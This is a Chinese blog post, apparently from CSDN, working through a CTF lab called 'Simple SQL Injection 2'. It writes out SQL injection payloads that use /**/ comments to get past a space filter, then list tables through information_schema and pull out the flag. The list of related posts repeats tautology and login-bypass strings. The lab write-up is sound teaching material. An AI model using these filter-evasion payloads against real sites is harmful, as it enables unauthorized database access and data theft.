简单的SQL注入2

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量698 收藏
点赞数
分类专栏: 实验吧 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40776369/article/details/83384084
版权

地址:http://ctf5.shiyanbar.com/web/index_2.php
参考资料:http://www.bubuko.com/infodetail-2301250.html
在这里插入图片描述

1.直接输入单引号,根据报错信息确定参数值类型为字符型
在这里插入图片描述
2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1,
仍然报错,信息为SQLi detected!,猜测空格被过滤,直接输入’or‘1’=‘1,如下图所示,确定空格被过滤。
在这里插入图片描述
3.尝试使用多行注释符(块注释符)
在这里插入图片描述
输入‘//or//‘1‘=‘2,无任何返回,确定块注释符可以使用。
4.爆当前数据库中的表
‘//union//select//concat(table_name)//from//information_schema.tables//where//table_schema=database()//having’1’='1
在这里插入图片描述
5.爆flag表中字段和值
'//union//select//concat(column_name)//from//information_schema.columns//where//table_name=‘flag’//having//‘1’='1
在这里插入图片描述
6.
'//union//select//flag//from//flag//having//‘1’='1
在这里插入图片描述

雨九九
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
简单sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
SQL注入(盲注——二分法POST)
qq_43520778的博客
09-07 320
[toc]SQL注入
对于 1=2 防止or注入的理解
Fanor_的博客
09-02 302
对于 1=2 防止or注入的理解
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 2646
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
二分法实现SQL盲注
小菜猴子_x
09-12 998
因为在buu上做题,然后无奈研究二分法实现SQL盲注
简单sql注入入门
d2231300271的博客
03-24 386
基本流程是:观察注入点->判断参数类型-->判断列数(group by或order by)-->观察是否存在显示位(就是页面能够显示列数据的位置(实践理解)),语法报错,异常页面显示(根据不同情况选择不同的注入方式)-->根据不同的注入方式依次显示库,列,表。当前99%以上的MySQL版本都是5.0以上,都支information_schema 库(),所以我们会使用该库进行爆数据库-->爆数据表--爆数据列-->爆数据(类似于根据目录查页数然后翻到相对于的位置)字段表示的是数据库中所有的字段信息。
’or 1=1# 初入SQL注入的万能语句
热门推荐
weixin_41607190的博客
09-23 3万+
噢,终于知道CTF里面的那些SQL注入题里面,每题基本都有 id=1’ 这个东西,然后就是一串语句后面加个 # 。 现在终于理解了。至于这个东西为什么叫万能语句,继续看吧。 在介绍之前,先介绍一下我们一般的登陆过程: 输入用户名:“username” 输入密码:“password” 但我们输入完了以后是怎么登陆进去的呢?每个程序都会有一些验证机制。说一种简单的,比如下面这种代码: sql=&am...
SQL注入思路详解
12-14
2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库交互的可能输入点 GET请求参数 POST请求参数 Cookie X-Forword-For User-Agent Refer Host...
mysqlsql注入简单测试了解
08-31
sql注入语句
PHP简单预防sql注入的方法
12-18
本文实例讲述了PHP简单预防sql注入的方法。分享给大家供大家参考,具体如下: 出现sql注入一般都是因为语法不规范不严谨造成的,问题出现在sql语句上,而起决定性的是quote(’)。如下: $sql = "delete from ...
分享一个简单sql注入
12-16
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力...
SQL注入时?id=1 and 1=1和?id=1 and 1=2的功能
m0_51756263的博客
07-09 9391
SQL注入时进行?id=1 and 1=1和?id=1 and 1=2操作的原因
sql简单注入
weixin_51646864的博客
06-13 667
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
【Spring】注入详解(原理、set注入、JDK内置类注入、自定义类注入、构造方法注入
See_Star的博客
09-07 1222
注入: Spring通过配置文件,为成员变量赋值; Set注入:Spring调用Set方法通过配置文件为成员变量赋值; 构造注入:Spring调用构造方法通过配置文件为成员变量赋值; 文章目录一、注入(Injection)二、简单注入实现三、Set注入3.1 JDK内置类型3.2 用户自定义类型3.3 Set注入的简化3.3.1 基于属性的简化3.3.2 基于p命名空间的简化四、构造注入4.1 有参构造注入4.2 构造方法重载五、总结 一、注入(Injection) 什么是注入? 通过 Sprin.
sql注入——报错注入
qq_52843411的博客
08-23 171
我们经过查询可知,cms下一共有八个表,因为显示行数有限,所以我们只能利用limit函数一行一行的查询,limit 0,1表示显示从第0行开始往下数1行,即回显第0行。我们从中可以看出,对我们有用的为cms_users表,我们接下来就是要知道cms_users表的结构,有哪些可用的内容。报错注入,我们首先要找到页面的报错点,报错注入是利用页面回显的报错信息来显示我们想要查询的信息。1=2时,回显就出错了,我们就要利用这种前后报错回显不同,来进行我们的报错注入。我们将1=1的位置替换为。
最最简单SQL手工注入教学,我奶奶都会
MachineGunJoe666
04-24 1884
这期教学是给小白学习的,大佬看看就好。 我们先打开靶场:【靶场】 我们先进去发现是一个很简单的页端。 我们先判断是否有注入。 我们先在链接后面添加: and 1=1 来判断是否有注入。 发现返回正常。 我们再在链接末尾输入:and 1=2 这里我们发现与之前and 1=1时的界面不一样了这就说明有注入。 (这里解释一下and 1=1是什么意思 其实很简单就是你问一个服务器1是不是=1 所以我们and 1=1 返回正常 and1=2就是问1是不是=2所以我们报错了)
《从0到1:CTFer成长之路》SQL注入-2
tr_trTTT的博客
04-13 3264
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入 上面就是题目,有登录框,我们先用手工测试sql注入。 手工方法: 1. 随便输入一个账号试试: 输入admin显示账号或密码错误,输入其他显示账号不存在,所以这里可以判断账号是admin; 2.开始判断注入 ...
0到1 ctfer: SQL注入-2
Zeker62的博客
08-31 1870
分析这个靶场 : 登录靶场,只有一个空空的界面: 很明显,这是一个登录到账号密码的关于SQL注入的题目 尝试输入admin和其他用户名,发现是不一样的报错: 说明这里的机制是:先检查账号是否存在,再检查账号和密码是否对应 由此可以使用burpsuite抓包进行报错注入的操作: 经过抓包,在burp上显示不同的内容: “账号不存在” “账号和密码错误” 所以由此可以判断出,账号密码是否正确,来源于报错: 用户名正确报错:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5
学习笔记-SQL注入-2
weixin_52501704的博客
09-15 341
SQL注入-二次注入(原理)
sql注入简单列子
05-30
假设有一个登录页面,用户需要输入用户名和密码。如果该页面没有进行输入过滤或参数化处理,那么攻击者可以通过构造恶意输入,从而实施SQL注入攻击。 例如,用户输入的用户名是:`admin'--`,密码随便填写,那么构造的SQL语句可能会变成类似下面的形式: ``` SELECT * FROM users WHERE username='admin'--' AND password='xxx' ``` 由于`--`是注释符号,这个语句就会忽略掉后面的所有内容,直接查询了用户名为`admin`的用户,从而绕过了密码验证,实现了登录。 这只是一个简单的例子,实际攻击可能会更复杂和隐蔽,因此在开发过程中一定要注意输入过滤和参数化处理,避免SQL注入等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值